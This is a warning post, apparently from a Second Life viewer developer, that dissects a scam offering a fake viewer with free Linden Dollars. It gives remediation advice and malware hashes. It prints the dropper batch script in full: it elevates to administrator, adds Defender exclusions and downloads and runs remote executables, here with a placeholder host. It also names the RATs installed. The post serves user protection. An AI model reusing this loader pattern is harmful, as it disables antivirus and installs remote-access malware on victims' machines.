This scam often starts as a instant message from someone in Second Life that looks like the following:
Hello,
Are you tired of spending your hard-earned Linden Dollars? We've got an exciting solution just for you! Introducing our SecondLive Viewer, where everything is not only free but also open for endless possibilities.
- Unlock unlimited Linden Dollars (L$) for all your virtual adventures.
- Fly to unlimited heights.
- Build on any land of your choice, all for free.
But that's just the beginning.
Link: <Some URL, typically a tinyurl link>
We're sincerely thankful to everyone who joins us in our mission to make SecondLife completely free. Don't miss this incredible opportunity.
Best Regards.
- Unlock unlimited Linden Dollars (L$) for all your virtual adventures.
This isn't possible. L$ isn't stored on the client. It is stored on the server that LL controls. You would need access to Linden Lab's servers, in which case:
- This is fraud, which is a crime. Generating L$ is not legal, and is a violation of both the Terms of Service and federal law.
- This is violation of the Computer Fraud and Abuse Act, which covers unauthorized access to computers. (Servers count as computers!)
- Linden Lab would know instantly. They have systems in place to track if anyone logs into their servers in a unauthorized manner. They also have systems in place to detect fraudulent transactions.
- Linden Lab will track the money. No matter how many times you "launder" it, the money is tracked.
Simply put, there is no way to get free L$ other than the currently available methods in SL such as money trees and games.
- Fly to unlimited heights.
This isn't anything new. Most third party viewers already allow you to fly to unlimited heights. LL even removed the flight limit.
If you are using firestorm:
- Paste this link in chat
secondlife:///app/openfloater/preferences?search=Enable%20usage%20of%20chat%20bar%20as%20a%20command%20line
and give it a click - Enable "Enable use of chat bar as a command line"
- Type this in chat:
gth 50000
- Observe you are now 50000 meters in the air!
You can find out what each of these commands do here: https://wiki.firestormviewer.org/preferences_chat_tab#cmdline_tab
- Build on any land of your choice, all for free.
This isn't possible. Land permissions are checked by the simulator, not the viewer. While it is possible to edit your avatar on any land, it isn't possible to create or rez objects on any land. In some cases, it may be possible to bring objects into no-build land, such as with scripted vehicles driving onto it, this is technically a feature.
A lot of stuff you don't want happening. I'll break it down into steps:
- You are instructed to download
viewer.exe
, upon execution it will pretend to install a viewer so that it looks legitiment. - Upon running the newly installed program, it will run
builddata.bat
, which looks like this:
net session>nul 2>&1
if %errorlevel%==0 goto main
echo CreateObject("Shell.Application").ShellExecute "%~f0", "", "", "runas">"%temp%/elevate.vbs"
"%temp%/elevate.vbs"
del "%temp%/elevate.vbs"
exit
:main
powershell -WindowStyle hidden Add-MpPreference -ExclusionPath C:\Users;Add-MpPreference -ExclusionPath $env:ProgramFiles;cd C:\Users\Public;Invoke-WebRequest https://example.com/V1 -OutFile V1.exe;./V1.exe;Invoke-WebRequest https://example.com/Q -OutFile Q.exe;./Q.exe;Invoke-WebRequest https://example.com/A -OutFile A.exe;./A.exe;exit
This script elevates the permission to administrator permissions ON YOUR COMPUTER! This is incredibly dangerous as it allows whatever is running to do what it wants. In specific, this script will download a file called "V1", "Q", and "A"
- The script will execute "V1", which installs "1" and "2".
- "1" will install Trojan.CobaltStrike, which is a penetration testing toolkit which cybercriminals often abuse in order to do remote administrative access.
- "2" will install Trojan.Molotov/Reflo. While I am not 100% sure about what it does, it is very likely another remote administration toolkit.
- "Q" will install Quasar, which is also a remote administration toolkit.
- "A" will install AsyncRAT which is also a remote administrative toolkit.
- Some of the tools will automatically install additional stuff not included in the script, such as a cryptominer.
- The script will execute
start.vbs
Start.vbs just shows a fake dialog saying that there was an error:
x=msgbox ("The OpenGL driver detected a problem with the display driver and is unable to continue. The application must close. Error code:3",0+64,"Error")
Attackers will intentionally install as many backdoors as possible so that it becomes increasingly difficult to remove, to the point where you should probably just wipe your hard drive and re-install your operating system.
Yes and no:
- No: The script it's self doesn't install anything else
- Yes: However, when each of the remote administrative toolkits are installed, it pings as server, which that server can tell the toolkit to install even more stuff.
While I could do further investigation, it involves going further than I feel reasonably safe doing so.
A remote administrative toolkit(also known as a RAT), is basically like giving someone physical access to your computer. They can, but no limited to, do the following:
- Steal your username / passwords
- Steal your browser cookies
- Steal your files
- Steal your banking information
- Steal your L$
- Steal your REAL WORLD money (through credit / banking / wire fraud)
- View your webcam and take pictures/videos
- View your desktop
- Install additional software
- Encrypt your files
- Delete your files
A cryptominer abuses your GPU to mine cryptocurrency such as bitcoin. This wastes electricity, computing power, and also degrades your graphics card. And you do not see a dime of what they make. It's basically turning your computer into a mining slave.
- Turn the computer that you installed it on OFF immediately! If the computer is off, they can't access it. Make sure you do not put it in a "sleep" state where the CPU is still operating in a lower power mode, make sure it is OFF off!
- Take your device to a computer technician who is specialized in removing viruses and malware. Be prepared to have to have your files backed up and system re-installed.
- Do not be tempted to use it until it is cleaned! Malware can spread over internal networks, and every moment it is on is a chance that the hacker will be able to steal any or more data from you!
- "viewer.exe" malware scan: https://www.virustotal.com/gui/file/b06bc0bac2af08133893a604abe30e6ea0195539eee6fad7750c812a422de3de
- "Q" malware scan: https://www.virustotal.com/gui/file/db548cd27e4828afc8ed7a2e61da467a814082e57d7b860c6c8ecf0a1b6ddf4f
- "A" malware scan: https://www.virustotal.com/gui/file/e8cfa912e022bed8fcf57d3a03a3f5a1780b5cd547b7c190029d7b082632215a
- "1" malware scan: https://www.virustotal.com/gui/file/de83dd82da3ebaa2c09fd75a7307ad5e2031ad8c911cd75753ffef3eb1571f0a
- "2" malware scan: https://www.virustotal.com/gui/file/2ef3678bf54e37a4ae0161e0a3a76a68d05f75164874af3ce6febd1d759f6109
The one and only official site to download the Cool VL Viewer binaries and sources is http://sldev.free.fr/
Anyone being offered my viewer by any third party should never accept it and immediately report to me.